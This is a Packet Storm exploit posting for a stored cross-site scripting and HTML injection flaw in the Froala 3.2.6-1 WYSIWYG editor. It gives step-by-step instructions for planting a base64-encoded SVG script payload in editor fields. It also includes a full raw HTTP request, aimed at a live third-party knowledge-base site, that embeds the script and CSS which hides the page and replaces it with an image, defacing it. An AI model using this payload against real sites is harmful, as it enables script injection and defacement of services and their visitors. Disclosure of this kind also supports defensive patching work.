what you don't know can hurt you

Froala 3.2.6-1 Cross Site Scripting

Froala 3.2.6-1 Cross Site Scripting
Posted Mar 9, 2021
Authored by Vincent666 ibn Winnie

Froala version 3.2.6-1 suffers from persistent cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
MD5 | 9a819a95233892d40a1f0d262acbd828

Froala 3.2.6-1 Cross Site Scripting

Change Mirror Download
# Exploit Title: Stored XSS and Html Code Injection Editor Froala
# Version 3.2.6-1
# Date:06.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://froala.com/wysiwyg-editor/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# My Youtube Channel: https://www.youtube.com/channel/UCZOWpC2dW9sipPq5z63C2rQ

PoC:

In the Froala I used xss code in base 64 and some tags for html code injection.


Vuln Fields: Embed Url,Insert Link,Insert Files,Insert Video,etc.

Example with Insert Files or Insert Image:

Click browse files – choose file img from computer

Insert on page , click on image and choose Insert Link and paste XSS code:

And insert! We have stored xss + full html code Injection deface page.

XSS Code:

https://pastebin.com/jUUXQbzs

Video with XSS and Html Code Injection:

https://www.youtube.com/watch?v=QO2XiR8N1P0

All fields with xss in base64 vulnerable to XSS. You can use method
Get or Post.

Encode your xss is here:

https://www.base64encode.org/

For Html Code Injection i use tags:

Table,Div,span,style,body and another.

Pictures:

https://imgur.com/a/WIfQQw5
https://imgur.com/a/P59ePrm
https://imgur.com/a/Ksc5VWX

Simple example on knowledgeowl.com: (They use Froala)

Create new article and in editor choose and press "Code View":

Paste xss code and again press "Code View" and save this.

Example link : https://test345.knowledgeowl.com/help/asxdcfvgbvnm

(Link works only 1 months)

https://app.knowledgeowl.com/kb/article-edit-save

Host: app.knowledgeowl.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0)
Gecko/20100101 Firefox/86.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data;
boundary=---------------------------116499600342865829691384395973

Content-Length: 4793

Origin: https://app.knowledgeowl.com

Connection: keep-alive

Referer: https://app.knowledgeowl.com/kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f

Cookie: (i delete this)

Upgrade-Insecure-Requests: 1

article-id=60464e9e8e121c1923587f5f&project_id=6043b120ec161c7539dea231&language=en&current_version=60464f2a8e121c172358807e&version=&category=&content_article=&linked_article=&dopen=1615238721&save-action=default&url_hash=asxdcfvgbvnm&title=asxdcfvgbvnm&toc_title=&internal_title=&art-redirect-url=&art-redirect-newtab=true&content=<p>""><embed
src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxCjk0IiBoZWlnaHQ9IjIwMCIgaWQ9InhzcyI+PHNjcmlwdCB0eXBlPSJ0ZXh0L2VjbWFzY3JpcHQiPmFsZXJ0KCJJIGVuY29kZWQgeHNzIGluIGJhc2UgNjQuIEFic29sdXRlbHkgYWxsIGVkaXRvcnMgdnVsbmFyYWJsZSB0byB4c3MgYW5kIGh0bWwvaWZyYW1lIGNvZGUgaW5qZWN0aW9uIGFuZCB0aGlzIGlzIG5vdCBhIGJpZyBwcm9ibGVtLCBiZWNhdXNlIHRoaXMgaXMgY2FuIGZpeGVkLiBGaXggb24gZWRpdG9yIHNpZGUgYW5kIHlvdXIgc29mdHdhcmUuIFdoYXQgZWRpdG9ycyB0aGUgYmVzdD8gVGlueU1DRSwgRnJvYWxhIGFuZCBDa2VkaXRvciEiKTs8L3NjcmlwdD48L3N2Zz4KCgo="></p><style>body{visibility:hidden;}html{background:
url(https://i.pinimg.com/originals/07/02/00/0702007f97e1804a8ca00fb36033e9ec.jpg)
round;}</style>&meta_page_title=&meta_description=&status=published&date_published=&author=6043b10eec161c8d39dea36f&visibility=public&callout=none&callout_expire=03/15/2021&version_type=&custom-version=&version_note=&related-id[]=&application_screens=&csrf-token=af5366a45b186b5407fb55a1285b0f6ece862e25a46ebcfc070ab1d146b8b990

POST: HTTP/1.1 302 Found

Date: Mon, 08 Mar 2021 16:25:33 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Set-Cookie: _authbysession=90d12858ba2ea25a0ad42782; expires=Mon,
08-Mar-2021 18:25:33 GMT; Max-Age=7200; path=/;
domain=app.knowledgeowl.com; secure; httponly

Location: /kb/article/id/6043b120ec161c7539dea231/aid/60464e9e8e121c1923587f5f

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 21

Content-Type: text/html; charset=UTF-8

The final results in a simple form:

We can use different fields in Froal's editor using cross site
scripting and html/iframe code injection in base 64.
Login or Register to add favorites

File Archive:

May 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    1 Files
  • 2
    May 2nd
    4 Files
  • 3
    May 3rd
    27 Files
  • 4
    May 4th
    17 Files
  • 5
    May 5th
    3 Files
  • 6
    May 6th
    20 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close